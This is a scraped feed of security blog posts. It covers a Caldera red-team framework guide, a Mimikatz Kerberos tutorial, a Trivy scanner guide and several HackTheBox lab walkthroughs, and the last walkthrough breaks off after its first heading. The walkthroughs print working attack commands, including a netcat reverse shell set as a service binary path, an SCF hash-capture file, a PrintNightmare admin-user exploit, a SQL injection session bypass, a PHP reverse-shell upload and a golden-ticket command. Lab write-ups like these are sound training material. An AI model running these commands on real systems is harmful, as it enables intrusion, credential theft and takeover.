Quantcast
Channel: Hacking Articles|Raj Chandel's Blog

Caldera: Red Team Emulation (Part 1)

0
0

This article aims to demonstrate an open-source breach & emulation framework through which red team activity can be conducted with ease. It focuses on MITRE simulation and has tons of other functions that can be used in the activity.

Table of Contents

MITRE Att&ck

Caldera

·         Pre-requisite & dependencies

·         Interface

·         Installation

·         Plugins

Campaigns

·         Step1: Abilities

·         Step2: Deploy an Agent

·         Step3: Setting up operations

·         Step4: Exporting the result

Conclusion

 

Mitre Att&ck

Mitre framework provides list of all the Tactics, Techniques and Procedure (TTPs) & their corresponding sub-techniques arranged in a well-structured form which can be used in red team activities.


 

 

Caldera

CALDERA breach & emulation tool designed to easily automate adversary emulation, assist manual red-teams, and automate incident response.

The framework consists of two components:

 

The core system: This is the framework code, consisting of what is available in this repository. Included is an asynchronous command-and-control (C2) server with a REST API and a web interface.

Plugins: These repositories expand the core framework capabilities and providing additional functionality. Examples include agents, reporting, collections of TTPs and more.

Pre-requisite & dependencies

These requirements are for the computer running the core framework:

·         Any Linux or MacOS

·         Python 3.7+ (with Pip3)

·         Recommended hardware to run on is 8GB+ RAM and 2+ CPUs

·         Recommended: GoLang 1.17+ to dynamically compile GoLang-based agents.

Installation

Follow these steps for setting up caldera:

git clone https://github.com/mitre/caldera.git --recursive


cd caldera

pip3 install -r requirements.txt

python3 server.py –insecure


Interface

Caldera provides web interface which is simple to navigate and use.

http://127.0.0.1:8888

username: red

Password: admin



Plugins

The Plugins category offers a list of all current plugins and allows you to quickly and easily access their functionality.

·         Access (Red team initial access tools and techniques)

·         Atomic (Atomic Red Team project TTPs)

·         Builder (Dynamically compile payloads)

·         CalTack (embedded ATT&CK website)

·         Compass(ATT&CK visualizations)

·         Debrief (Operations insights)

·         Emu (CTID emulation plans)

·         Fieldmanual (Documentation)

·         GameBoard (Visualize joint red and blue operations)

·         Human (Create simulated noise on an endpoint)

·         Manx (Shell functionality and reverse shell payloads)

·         Mock (Simulate agents in operations)

·         Response (Incident response)

·         Sandcat (Default agent)

·         SSL (Enable https for caldera)

·         Stockpile (Technique and profile storehouse)

·         Training (Certification and training course)

To know more about particular plugin, follow the link.

Campaigns

Agents, adversaries, and operations make up the Campaigns category, which may be used to build up the numerous agents, adversaries, and operations needed for a red team operation or adversary emulation.

Step1: Deploy an Agents

To begin with initial access we need to implant an agent inside the target system.

To set up an agent or listener:

1.       In campaign tab, click on agents


2.       Choose an agent (3 types currently available)


3.       Choose the platform (Windows, Linux or Darwin [mac OS])


4.       As soon as the platform is selected, you need to set up the IP, Port & name of the implant


5.       It will also give set of commands needed to be executed on the target

·         In case of Linux/Mac OS, execute it on terminal


·         Deploy agent inside the target machine by simple copy paste


·         In case of Windows, execute it on PowerShell (Bypass the execution policy first)


·         Deploy agent inside the target machine by simple copy paste.

 



6.       The agent pops backs onto caldera which specifies the command which was executed on the victim end was successful


Step2: Abilities

An ability is a specific ATT&CK tactic/technique implementation which can be executed on running agents. Abilities will include the command(s) to run, the platforms / executors the commands can run on (ex: Windows / PowerShell), payloads to include, and a reference to a module to parse the output on the CALDERA server.


As you can see in above ss, we can select Platform and related TTPs. Let us take discovery as a tactic & Linux as platform (same tactic demonstrated for windows in this article)


Step3: Setting up Operations

After setting up the agent, now it is time to run the abilities or the set of instructions as shown above. For this we need to set up an operation

To do this:

1.       Under Campaigns tab, select operations

2.       Choose Create operations


3.       Choose the adversary (Adversary Profiles are collections of ATT&CK TTPs, designed to create specific effects on a host or network. Profiles can be used for offensive or defensive use cases.)


4.       Fill in the details and specifications of the operation you want to run


5.       Click on start, after a while you can see that it starts running and populating the results on the screen



6.       As you can see, all set of commands running is obfuscated in base64nopadd format (also you can select other options specified), we can also see the command and also, we can view output of the command (Also, we can see the status of the task performed)





Step4: Exporting the result

After the activity has been completed, we can extract the report in two ways:

1.       Directly from the download tab which appears after operation is completed


2.       Go to debrief tab, choose the pointers to be included in the report; then download the full report as PDF



Conclusion

We have thus been able to perform the adversary simulation by the help of Caldera. Using this framework, Red/Purple team activities can be easily performed.

Reference: https://caldera.readthedocs.io/en/latest/

Author: Ankit Sinha is an infosec researcher

 














































MimiKatz for Pentester: Kerberos

0
0

This write up will be part of a series of articles on the tool called Mimikatz which was created in the programming language C. it is mostly used for extracting Kerberos ticket from the memory and generating golden tickets.

In this scenario, we will be using Mimikatz inside the client machine to find out tickets available within the client system.

We will use the command:

Kerberos::list

This list command will display all the tickets available on the client machine.



As you can see from the above screenshot, there are 2 tickets within our client machine. The list command will provide information such as:

1.       Start/End time of ticket

2.       Server name

3.       Client name

4.       and the Flag

Now once these information has been available and if we want to save those for future use or reference, we will use the following command: Kerberos::list /export. This will save the above TGT tickets in the Mimikatz folder in the kirbi format.


 

Now that the ticket has been saved in the Mimikatz folder, we renamed it to ticket.kirbi for ease of use. Note that this is not a mandatory process.

Since we have this ticket, we will now see how it can be used later on for lateral movement so that we can perform pass the ticket attack.

To perform the pass the ticket attach (ptt) we will issue the following command:

Kerberos::ppt ticket.kirbi

Once the command has been executed successfully, we will issue another command misc::cmd which will open a command prompt session. We can see that the command prompt session has been opened with the domain user ignite\aarti.

Let’t try to browse the directory of the server with the user aarti by typing the following command in the command prompt:

dir \\192.168.1.188\c$(192.168.1.188 being the server ip address)

As you can see, we are able to view all the directory of the server.

So being a non-administrator domain sccount, the user aarti was able to check the directory of C driver of the server by using PTT attack.


 

Kerberos TGT

To display all TGT (Ticket Granting Ticket), we can use the following command:

Kerberos::tgt



Kerberos ASK

It helps you to access the service ticket. The syntax for running this command are as follows:

Kerberos::ask /target/spn name ,where spn name is cifs:/dc1.ignite.local

To display all the service ticket, we issue the command: Kerberos::list

As we can see, we have 3 ticket listed below.



Kerberos Hash


This will dump all hashes available on the client machine.

Golden Ticket Attack (GTA)

Golden Tickets are forged Ticket-Granting Tickets (TGTs), also called authentication tickets. Some basic information needed to perform this attack are:

1.      Domain name: ignite.local

2.      SID: S-1-5-21-1255168540-3690278322-1592948969

3.      KRBTGT Hash: 5cced0cb593612f08cf4a0b4f0bcb017

4.      And an impersonate user: raaz

So if we have the domain name, the SID and the hash value of krbtgt, then we can go for pass the ticket attack by generating fake golden ticket attack.

So the command for performing GTA is as follows:

Kerberos::golden /user:raaz /domain:ignite.local /sid S-1-5-21-1255168540-3690278322-1592948969 /krbtgt: 5cced0cb593612f08cf4a0b4f0bcb017 /id:500 /ptt

Where the id:500 is for administrator privilege


As shown above the command has completed successfully. Now let’s launch the command prompt via Mimikatz by issuing the command: misc::cmd

Via the new command prompt, we will be able to access the server directories same as in previous examples.

Another method of golden ticket attack can be performed by using the tool impacket.


When using Mimikatz or Rubeus, they will generate the ticket in .kirbi format file. But if we use impacket for golden ticket attack so that we can get the ticket, it will not give you ticket in kirbi format. It will give you the ticket in .ccache format.

So if we have the ticket in ccache format, then we can performed the pass the ccache as shown below. Command is: Kerberos:: ptc administrator.ccache

The msic::cmd which will open a new command prompt which via which we will be able to access the server directories, same as our previous examples.



If we want to list all the ccache file that exist on the client system, the we use the following command: Kerberos::clist administrator.cache


 

If we want to delete all the tickets, either ccache or kirbi format, we can use the following command:

Kerberos::purge



 

 

 

Containers Vulnerability Scanner: Trivy

0
0

This article talks about Trivy, which is a a simple and comprehensive vulnerability scanner for containers and other artifacts, suitable for Continueos Integration and Testing.

Table of Contents

·         Introduction

·         Installation

·         Scanning Git Repository

·         Scanning Container Image

·         Scanning Filesystem

·         Scanning From Inside Containers

·         Embed Trivy in Dockerfile

 

Introduction

Trivy is an open-source tool by aqua security to scan for vulnerabilities and misconfiguration errors. This tool works at various levels: it can evaluate Infrastructure as Code, inspect container images, deliver configuration file assistance, analyze Kubernetes implementations, and review the code in a Git repository. With the ease of usage, trivy can be simply be integrated in CI/CD pipeline (DevSecOps) by installing and adding binary to the project. Trivy offers thorough visibility across programming language and operating system packages and has a wide database of vulnerabilities which allows quick scans of critical CVEs. With various new advancements in the tool, it has helped pen-testers and cybersecurity researchers to ensure continuous scans making the process of DevSecOps faster and efficient.

Installation

The installation is quite simple. Follow the below given commands to install Trivy from the official repository on your ubuntu machine.

sudo apt-get install wget apt-transport-https gnupg lsb-release

wget -qO - https://aquasecurity.github.io/trivy-repo/deb/public.key | sudo apt-key add -

echo deb https://aquasecurity.github.io/trivy-repo/deb $(lsb_release -sc) main | sudo tee /etc/apt/sources.list.d/trivy.list

 


sudo apt-get update

sudo apt-get install trivy

Once the tool has been installed and updated, you are ready to scan files.



Scanning Git Repository

 

As I have described above, we can use trivy for scanning security loopholes amoung multiple platforms.

 If you are using Git Repository and you can scan git file directly without downloading the entire package.

sudo trivy repo https://github.com/appsecco/dvna

 


Scanning Container Image

 

Docker is an open-source project and for the IT organization docker security is a biggest concern and they are looking for docker security advisories and tools that can identify vulnerabilities inside any docker image.

You can scan the docker images to identify vulnerabilities by following the below given steps.

Step1: Check the Image ID of the Container image that you want to scan.

sudo docker images

Step2: Use the below given command to scan the container image.

sudo trivy image 4621d4fe2959

 


You can also scan the images for a particular severity of vulnerabilities and save the report in text format using the below given command.

sudo trivy image --severity HIGH 4621d4fe2959 > result.txt

tail result.txt



Scanning Filesystem

Trivy can be used to scan a filesystem (such as a host machine, a virtual machine image, or an unpacked container image filesystem).

(Note: We are using vulnerable-node from Filesystem for this practical.)

 

Use the below given command to scan any filesystem for vulnerabilities.

trivy conf services/



Scanning From Inside Containers

You can easily scan running container from inside. Follow the below given steps to scan a docker file.

Step1: Run the docker file that you want to scan.

sudo docker run -it alpine

Step2: Add Trivy scanner to the file and run it.

apk add curl \

&& curl -sfL https://raw.githubusercontent.com/aquasecurity/trivy/main/contrib/install.sh | sh -s -- -b /usr/local/bin \    && trivy filesystem --exit-code 1 --no-progress /

 


 

Embed Trivy in Dockerfile

Scan your image as part of the build process by embedding Trivy in the Dockerfile. This approach can be used to update Dockerfiles currently using Aqua’s Microscanner. Follow the below given steps to scan docker file while building it.

Step1: Add trivy to the docker file.

FROM alpine:3.7

 RUN apk add curl \

    && curl -sfL https://raw.githubusercontent.com/aquasecurity/trivy/master/contrib/install.sh | sh -s -- -b /usr/local/bin \

    && trivy filesystem --exit-code 1 --no-progress /

 Step2 : Build the image.

sudo docker build -t vulnerable image .

 


 

It will scan the docker file while the image is being built and give the report as shown below.

 


Author: Mukund Mehrotra is a cybersecurity researcher , technical writer and an enthusiastic pen-tester at Hacking Articles. Contact here.  

Return HackTheBox Walkthrough

0
0

Return is a Windows machine on HTB and is rated as easy, this box is designed over windows that have Weak Service Permission. If summarized, we will abuse a printer admin portal to get hardcoded credentials through netcat and use them for WinRM login. The printer service account is a member of the Server Operators group which allows one to stop and start some services. Thus, we exploited weak configured services to execute our malicious exe file by abusing the Server Operators' permission.

Table of content

Initial Access

·         Enumeration

·         Credential Dumping

·         WinRM Valid Account

·         User Flag

Privilege Escalation

·         Abusing weak service permission

·         Root lag

 

Let’s deep dive into this.

Initial Access

First, we do a Nmap scan of the machine’s IP address to find the open ports and observed some ports are open, from Microsoft Services we understood its Windows Operating System.

nmap –sV –sC 10.129.31.219


Enumeration

Since port 80 is open, let’s try to access the IP address via a browser.


As you can see, we have access to a printer admin panel. The pages are running PHP. Let’s navigate to the setting tab.


The above setting shows us the username which is svc-printerand the hardcoded password which has been masked. The server address field is the only field that works as a parameter then the update button is pressed. So the printer is communicating with the local address on port 389.

What if we replace the server address with the attacking machine IP address using port 389?


Credential Dumping

Once we have replaced the server address from the Attackers IP (Kali Linux), we launched Netcat listener on port 389 on our kali machine.

nc –lvp 389

Once we hit the update button, we obtained the password “1edFg43012!!


WinRM Valid Account

Let’s use evil-winrm to establish a remote connection. This can be done by issuing the command below:

Evil-winrm -I 10.129.31.219 -u svc-printer -p “1edFg43012!!

We have access to the server. Let’s browser to the desktop directory and see if we can find any flags. Indeed, as shown in the above screenshot, we can find the user.txt flag.


Privilege Escalation

Now that we have access to the machine, let’s verify which user permission or group we have.

To verify this, we issue the command net user svc-printer

From the screenshot below, we can see that the actual user is a member of the server operatorgroup.


What can a user with a Server Operators group membership do?

The server operators can start and stop services.


The server Operator group is considered as a service administrator and can change binaries that are installed on the domain controller, read more from here.

upload /usr/share/windows-binaries

Thus, we first uploaded the nc.exe windows binaries file and then enumerate for installed services for further exploitation.

services

we found a list of installed services and their path along with true/false flags for privileges.


Abusing Weak Service Permission

Here we need to analyse which binary path we can modify to execute nc.exe file

First, we try windows defender to change the binary path for WinDefend but got an access denied error.

sc.exe config WinDefend binPath="C:\Users\svc-printer\Desktop\nc.exe -e cmd.exe 10.10.14.93 1234"

Then we try to modify the binary path for VMTools and finally this worked for us.

sc.exe config VMTools binPath="C:\Users\svc-printer\Desktop\nc.exe -e cmd.exe 10.10.14.93 1234"


Since SVC-printer is a member of the server operator thus we can restart the service to get the reverse connection. So, let's stop and start the service VMTools by issuing the command:

sc.exe stop VMTools

sc.exe start VMTools

 


 

Before start the service VMTools, we make sure that the netcat is listening on port 1234 as shown below.

Once the service is stop and get start, we got netcat session as obtain Root flag. J



Timelapse HackTheBox Walkthrough

0
0

Summary

Timelapse is a HTB Active Directory machine is an easy machine but as the concept of initial compromise is unique therefore, I believe it should categories as Intermediate. By solving this lab I learn how can an attacker steal CA certificate to perform lateral moment.

Table of content

Initial Access

·         Nmap

·         SMB-client

·         Openssl

·         Winrm

Privilege Escalation

·         WinPeas

·         Credential Dumping

·         Abusing LAPS

 

Initial Access

 

Let’s deep dive into the time.

Nmap

From the nmap scan, we can see that this is a Window Server more precisely a domain controller since we have DNS, LDAP, Kerberos and SMB ports open.  Also WinRM ( Windows Remote Management) port 5986 is present.


SMBClient

 

Let’s use smb client to find if there are any share folders are available for anonymous login. Indeed, there is a sharing enable with the name of “Shares”.


Now we try to connect to that folder using smb client and browse the directory to find other sub folders. The winrm_backup.zip is actually password protected. So we need to crack it.

In our scenario, we used fcrackzip to crack the winrm_backup file using the wordlist rockyou.txt.

fcrackzip -D -u winrm_backup.zip -p /usr/share/wordlists/rockyou.txt


Once we have cracked the password, we can use it to unzip the file. Once extracted, we find a .pfx file called: legacy_dev_auth.pfx. PFX files are actually digital certificates that contains both the SSL certificate public and private keys.

unzip winrm_backup.zip

pfx2john legacyy_dev_auth.pfx >pfxhash


Openssl

Now, we are going to convert that pfx file to the hash and crack it using the hash using John to get the private key and the pem key. As you can see, the password is thuglegacy.

We will try to open the certificate using openssl and as we can see it is a Microsoft Software Key Storage Provider. We can extract the certificate and private key.

 

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv-key.pem -nodes


openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out certificate.pem


Once the private key available, we can use this key to login on the box.

We will use evil-winrm to login using both the pem certificate and pem private key. Instead of password we can login with the keys also.

evil-winrm -i 10.129.227.105 -c certificate.pem -k priv-key.pem -S -r timelapse


Privilege Escalation

Now we have a shell on the box. It seems we don’t have anything in the document library. Let’s browse to the desktop library to see if we can find any flag. Indeed we have a user.txt flag on the desktop.

Now we will use updog to upload winPEASx64.exe on the server.

Let’s download updog. Another alternative, is to use python httpSimpleServer but in our scenario we are using updog.


WinPeas.exe

Once installed, lets run updog on 80. As shown below, updog is running on port 80 now.


Then on the server we download the winPEASx64.exe using wget command. Once download is complete, lets execute the winPEASx64.exe




Let’s read the ConsoleHost_History.txt file and see what information we can extract from it.

 


 


Credential Dumping- LAPS

As we can see from the file, the username is svc_deploy and the password has been assigned to the variable p. now let’s verify in which group the user svc_deploy is a member of. It is a member of the LAPS_Readers group. LAPS stands for Local Administrator Password Solution. It ramdomise all the password for all local machines so that you cannot execute passthehash attack. However, it stores the password on active directory itself and only members of LAPS_Readers can read the password.

Let’s check all users available on the box by using the command net users. We found a user account named svc_deploy. Let’s check in which group membership this is located. Its in the LAPS_Readers group.  

 


Now we can try to connect using evil-winrm using the username and password from the consolehost_history.txt file. And the password is in the ‘ms-Mcs-admpwd’

 

evil-winrm -i 10.129.227.105 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S

Get-ADComputer DC01 -property 'ms-mcs-admpwd'


Now once we have administrator password, we can connect using eveil-winrm to connect to the box.

evil-winrm -i 10.129.227.105 -u administrator -p 'gU}0649&H)l8VrkJB1n95q0A' -S


And we have logged on. We can now browse and go on the desktop directory to see if we can capture any flag. There you go. We can see the root.txt. 

Driver HackTheBox Walkthrough

0
0

 Introduction

The driver is an easy-rated Windows box on the HackTheBox platform. This is designed to understand initial exploitation using an SCF file and further escalate privileges locally using PrintNightmare (printer driver vulnerability). The box covers the fundamentals of enumeration and points to the importance of attention to detail while pentesting.

 

Table of content

Initial Access

·         Enumeration using Nmap and other tools

·         Compromising low-priv hash using SCF file

·         Evil-WinRM to access low-priv account

·         User Flag

Privilege Escalation

·         Abusing printer driver vulnerability

·         Root flag

Let’s deep dive into this.

 

Initial Access

The IP address assigned to the machine is 10.129.32.68. Upon running Nmap scan on this, we get the following result



We check each port for enumeration and further access. Only port 80 seemed to have a gateway which could lead further. But it was bound by a password.



But knowing the password is essential. We see in nmap results that an MFP printer website is running on this port. By operating under the assumption that websites for hardware products generally have default password set, we try admin/admin and it worked!



Further, we see there’s a firmware update option on the website which takes in a file. We looked for firmware files and how shells could be injected into them for execution. A far simpler method came up by which we could inject a Shell Command File (SCF) into the update-portal. You can read more about SCF here. In Nmap, we see that a Windows server was running so the server could successfully run an SCF file.

We simply created an SMB server and used a UNC path to access it in order to catch current running user’s hash.

cat shell.scf

[Shell]

Command=2

IconFile=\\10.10.14.93\tools\ignite.ico

[Taskbar]

Command=ToggleDesktop

Further, we just upload this to the Firmware Updates section.



Before hitting submit, we launch our smbserver using impacket tool suite. And then upon hitting submit, we see Windows server ran the file and we captured a low-priv user tony’s hash.

smbserver.py tools $(pwd) -smb2support



We save this hash into a file and then run john the ripper using rockyou dictionary file. We see a cracked credential “liltony”



Next, we tried using SMB tools to access the shell to the server but it didn’t work. In Nmap we see WinRM running so we tried evil-winrm to access tony’s account. You can install evil-winrm using gem. Then we access user.txt on Desktop.

gem install evil-winrm

evil-winrm -i 10.129.32.68 -u tony -p liltony

cd ..\Desktop

cat user.txt



 

Privilege Escalation

To enumerate further for privilege escalation, we use winPEASx64.exe. We can download this using wget.

wget https://github.com/carlospolop/peass-ng/releases/download/20221006/winpeasx64.exe



We can use the upload feature in evil-winrm to put this file on our box and then run it.

upload /root/winpeasx64.exe

.\winpeasx64.exe



In one of the findings, we see that a powershell history (ConsoleHost_history.txt) file was saved and accessible.



Upon accessing it, we can see that a printer driver for RICOH PCL6 printer was added.



Reading more about the driver, we found that it is vulnerable to PrintNightmare vulnerability. You can read more about it here. So, we download the powershell exploit created by John Hammond.

wget https://raw.githubusercontent.com/johnhammond/cve-2021-34527/master/cve-2021-34527.ps1



Further, this exploit works by creating a new DLL, adding an admin account onto the box and then removing traces. So, we upload this exploit onto the box using evil-winrm and create our own admin account- aarti/Ignite@123987.

Set-ExecutionPolicy RemoteSigned -Scope CurrentUser

Import-Module .\CVE-2021-34527.ps1

Invoke-Nightmare -NewUser "aarti" -NewPassword "Ignite@123987"



We can confirm the exploit’s working by checking the new user’s existence in the server by using net user command.

net user

net user aarti



Finally, we can user evil-winrm again to connect to the machine and snag our root flag.

evil-winrm -i 10.129.32.68 -u aarti -p ignite@123987

cd c:\users\administrator\desktop

cat root.txt


Conclusion

Driver box on HackTheBox platform is a good beginner friendly Windows box that teaches basics of exploitation using a server-side file execution vulnerability and then privilege escalation using a very famous printer driver vulnerability. Thanks for reading.

Pandora HackTheBox Walkthrough

0
0

Summary

Pandora is Linux machine and considered as easy box by the hack the box but indeed it is not. With this box we will need to perform other port scan instead of being relied on only TCP ports results. Then we will dig about SNMP protocol and find out a very interesting information for us which will lead us to initial foothold to the target machine. Then we will need to perform Horizontal privilege escalation and local port forward to enumerate service running on target’s internal port. Then we will exploit the admin console which is vulnerable to the SQL injection and upload malicious file to get a reverse shell as a different user. In the post exploitation phase, we will abuse SUID binary using path hijacking technique.

Table of content

Initial Access

  • TCP Port Scan

  • Enumeration

  • UDP Port Scan

  • SNMP Enumeration

  • User Shell as Daniel

 

Horizontal Privilege Escalation

  • Enumeration

  • Port Forwarding

  • CVE-2021-32099 SQL injection Exploitation

  • File Upload

  • User Flag

 

Privilege Escalation

  • SSH Key Generate

  • SUID Path hijack

  • Root Flag

Let’s exploit it step by step.

 

Initial Access

We are going to start assessment with the TCP/IP port scanning.

 

TCP Port Scan

Let’s start with the port scan. We are using nmap to find out which ports are open so we can begin our port and service analyse. Nmap is a popular port scanning tool come with Kali Linux. In order to perform port scan, we have used -sC and -sV flags.

Flags features:

-sC   : Scans with default NSE scripts

-sV   :  Attempts to determine the service version

Command used:

nmap  -sC -sV 10.129.26.243



From the nmap scan, we have found there were only two ports open, which is port 80 and port 22. As usual HTTP service is running on port 80 and the SSH service is running on port 22. Http service is used for the webhosting and the SSH service is used for remote connection. SSH version is latest and does not look like vulnerable and the possible attack we can perform against the SSH service at this stage is bruteforce only which we might not need to. Instead of thinking about the SSH bruteforce let’s start enumerating port 80.

 

Enumeration

We begin enumeration by accessing port 80 over browser. Webpage does not have much interesting things, but we can see domain name is available there which is Panda.htb. Next thing we can analyse what this website made for, and it does. Remember every website is created for some purpose with this mindset we assumed this website is serving games and the network monitoring solutions.

URL: htttp://10.129.26.243



 

UDP Port Scan

Got stuck for some time as we did not get any lead to get foothold into the target system, we decided to perform an UDP port scan. When we do normal nmap scan, it only scans TCP ports but not UDP so many time UDP port may lead us to interesting findings. After the completion of the UDP port scan we found that SNMPport is open on its default port which is port 161. Now we can go for the further enumeration against the SNMP port but let’s talk about SNMP first.

What is SNMP and what it is used for?

Simple Network Management Protocol (SNMP) is a networking protocol used for the monitoring and management of the network connected end devices in the internet protocol networks. It is embedded in multiple local devices such as routers, switches, servers, firewalls, and wireless access points using IP addresses. It runs on UDP protocol and uses port 161 and 162 as its default port. 

Command used:

nmap  -sU 10.129.26.243

Flags features:

-sU   : Scans UDP ports

 


 

SNMP Enumeration

 Once we found that SNMP service is running and port is open on 161, we are in the position to go for the further enumeration process. In order to enumerate SNMP service, we need to know what we are going enumerate on that service which will give us an important information that will be useful for the future analysis and the assessment. Whenever we come to enumerate SNMP, we need to focus on couple of things such as Community Strings and versions. In most of the cases community strings ispublic and version may be different in each case. There are three versions in the SNMP, which is V1, V2 and V3 which is differentiated by their features. In the table below we can see each version has different security features from weak to encrypted.


We will enumerate community strings and the version with snmp-check.

Command used:

snmp-check 10.129.26.243






With snmp-check, we have found that SNMPv1 is used, and community string is public. Now we are on position to enumerate further based on the community strings and the version. For that, we will use snmpwalk.

Command used:

snmpwalk -c public -v1 10.129.26.243

 


Snmpwalk has given an interesting finding here, if we scroll down, we will see there a username daniel and password HotelBabylon23 is there. From here, we can think about login via SSH as SSH port is open and we can test with found credentials.

 

User Shell as Daniel

We have successfully logged in as Daniel and tried to retrieve our user flag but unfortunately, we do not have permission to get user flag as it is belonging to user matt. To retrieve the user flag, we need to compromise matt account then only it is possible to retrieve the flag contents.

Command used:

ssh daniel@10.129.26.243

cd /home

cd matt

ls

cat user.txt

 


 

 

Horizontal Privilege Escalation

Here we need to do a horizontal privilege escalation. There are two types of privilege escalations, one is vertical where we get user shell then just need to get root shell but, in our scenario, it does not apply, and we must go through horizontal way where we need to compromise another user to escalate to root.

 

Enumeration

Let’s transfer linpeas and check what it brings to us. Linpeas is an automated script which is useful to find the privilege escalation vectors in the target system. In the below picture we transferred linpeas.sh in the target /tmp directory and gave execute permission with chmod 777 and simply executed.

Command used:

cd /tmp

wget 10.10.14.3/linpeas.sh

chmod 777 linpeas.sh

./linpeas.sh

 







From the linpeas result, we noticed a SUID pandora_backupis there which is uncommon system binary, so we decided to find out more about it. Owner of this file is root, but matt has execution permission. Also, web is hosted on internal server which is only accessible from the internal port which means we cannot access it directly from our Kali machine but if we manage to forward its local host port to our kali machine then we can access it. If we give a closer look at the picture above, pandora.panda.htb is running on port 80 which is hosted from /var/www/pandora. Additionally, we can also assume it by checking config file in the which is available in the /etc/apache2/sites-enabled directory.

 

Port Forwarding

As we know there is a service running on local port 80. We decided to use local port forwarding technique here. It can be done from kali machine if we have valid credentials.



Command used:

ssh -L 8084:localhost:80 -N -f -l daniel 10.129.26.243

Flags features:

-L   : Listening port on Kali

-N   : Do not execute any remote command

-f   : Run in the background

-l  : Username 

After local port forwarding, we can access the service which was running on the target internal port. An interesting finding came up and lead us to the pandora login console.





While enumerating the console we found a CMS with version is there on the right bottom side of the page: v7.0NG.742_FIX_PERL2020.

URL: http://localhost:8084/pandora_console/

After few searches on google we found Pandora FMS 742 is vulnerable to the SQL injection. A detail information about the vulnerability can be found below:

https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained

 

CVE-2021-32099 SQL Injection Exploitation

The blog had a detailed information about the vulnerability but no POC or exploit code was available then we search for the CVE number so we can expand and filter our search on google to find out the exact resource that we are looking for. We found CVE-2021-32099 belongs to this vulnerability and found an exploit encoded POC in the Github.

Reference:https://github.com/ibnuuby/CVE-2021-32099

We decoded the URL and tested this payload against the target.

Decoded payload:

http://localhost:8084/pandora_console/include/chart_generator.php?session_id=a' UNION SELECT 'a',1,'id_usuario|s:5:"admin";' as data FROM tsessions_php WHERE '1'='1



File Upload

We successfully exploited admin console and from here we can think about the uploading malicious file so we can get a reverse shell once it executed. Whenever we come across admin console, we see most of the time that admin has permission to upload file on CMS, with the same concept we upload a file by navigating admin tools then file manager.

 



There is an up-arrow tab on the right side of the file manager which will let us upload a malicious file.



Here we are going to upload a regular Pentest monkey’s PHP reverse shell which comes with the Kali and available in the /usr/share/webshells/php directory with named as php-reverse-shell.php. Next, we will copy this reverse shell to the to the root directory and rename as shell.php.

Command used:

cd /usr/share/webshells/php

cp php-reverse-shell.php /root/shell.php



Once we copied the reverse shell to the root directory then we need to make a minor modification in the shell.php. We need to provide ourIP addressand the listening port number which is 1234 in order to get reverse connection back to our machine.



Now we are in the position to upload our malicious file to the CMS.  We can select browse tab and upload our file from there and press Go. Our file is uploaded and saved in the /imagesdirectory.

 

User flag

After uploading malicious file, we can execute by accessing /images directory over browser along with our file name which is shell.php. Before accessing our uploaded file, we need to set netcat listener in our Kali machine.



URL: http://localhost:8084/pandora_console/images/shell.php

Command used:

nc -lvp 1234



Once we set up the listener in our Kali machine, we can access the above URL to get reverse connection back to our Kali machine. With the reference above picture, we can see that we have successfully got a reverse shell as user matt. Now we can grab our user flag from the /home/matt/ directory.

Privilege Escalation

We found a SUID binary from the linpeas output but at that stage we could not be able to exploit that as we had Daniel shell not matt shell and SUID was set for Matt with execute permission. Ltrace is pre-installed in the pandora box so we can use this tool to enumerate the pandora_backup file. From the out we can see that program is saving backup to the /root/.backup directory without providing full path of the binary. So here the possible attack is to hijack its binary path. In order to do the path hijacking lets get a stable fully interactive shell so we can perform our attack without any shell issues.

SSH Key Generate

We will generate a SSH key in our kali and save as pandora. Two keys will be generated one is public key and another is private key. We need to transfer public key to the target system. To send the file to the target system we need to set up python server in our Kali on port 80, it is not mandatory to use port 80 we can use any port as our wish.

Command used:

ssh-keygen -f pandora

ls -la

python3 -m http.server 80



Next, we need to transfer public key in the matt user home directory. If there is no .ssh directory, then we need create one and place public key to .ssh directory then we need to change its name to authorized_keys and provide right permission to .ssh directory where keys are kept.

Command used:

mkdir .ssh

cd .ssh

wget 10.10.14.3/pandora.pub

mv pandora.pub authorized_keys

cd ..

chmod +R 777 .ssh



Once we followed the above steps then we need to give chmod 600 permission to the private key which is stored in our Kali. Next, we will connect with the target system as matt using this private key. This part is a kind of maintaining persistence and gaining fully interactive shell as user matt. The main reason we are login in with the ssh key because we do not have user matt password and it can be very painful if we lose shell during the exploitation process.


SUID Path Hijack

Now we are in the position to abuse SUID tar binary. Let’s understand the methodology behind the attack. Whenever matt user executes the program pandora_backup then it will use tar command which has no binary path set so we will make a fake tar executable and put /bin/bash and set its binary path to our current path where our malicious tar executable is present.

Command used:

cd /tmp

echo “/bin/bash” > tar

chmod 777 tar

export PATH=.:$PATH

 

Root Flag

 Once path is set and if the matt executes the program, then it will execute tar from the path we have set, and a root shell will get spawn. Once root shell will spawn then we can grab our root flag from the /root directory.

Command used:

/usr/bin/pandora_backup

cd /root

ls

cat root.txt

Conclusion:

This machine was fun and was great source of learning, where we have learned and explored so many things such as TCP port scan, UDP port scan, service enumeration, SNMP enumeration, port forwarding, SQL injection, malicious file upload, horizontal privilege escalation, ssh key generate, SUID path hijacking.

Thank you for giving your precious time to read this walkthrough. I hope you have enjoyed and learned something new today. Happy Hacking!

 

Author: Subhash Paudel is a Penetration Tester and a CTF player who has keen interest in various technologies and love to explore more and more. Additionally, he is a technical writer at Hacking articles. Contact here: https://au.linkedin.com/in/subhash-paudel-a021ab207



Paper HackTheBox Walkthrough

0
0

Summary

Paper is Linux machine and considered as easy box by the hack the box. On this box we will begin with basic port scan and move laterally. Then we will enumerate domain name and exploit a secrets leaking vulnerability found in the WordPress plugin which will lead us towards secret chat domain. Then we will create a new user account and enumerate all the conversations and take advantage of the bot feature to read sensitive file which will give us initial foothold to the target machine. Then we will be tasked to gain root access where we will exploit it using policy kit vulnerability found in year 2021 by Kevin Backhouse. A successfully execution of the exploit will spawn a root shell.

Table of content

Initial Access

  • TCP Port Scan

  • Initial Enumeration

  • Find Domain Name

  • Web Page Enumeration

  • Searching For the Exploit

  • Secrets leaking Vulnerability Exploitation

  • Subdomain Enumeration

  • Bot Feature Abuse

  • User Flag

  •  

Privilege Escalation

  • PolicyKit Exploit: CVE-2021-3560

  • Root Flag

Let’s exploit it step by step.

 

Initial Access

We are going to start assessment with the normal TCP/IP port scanning.

 

TCP Port Scan

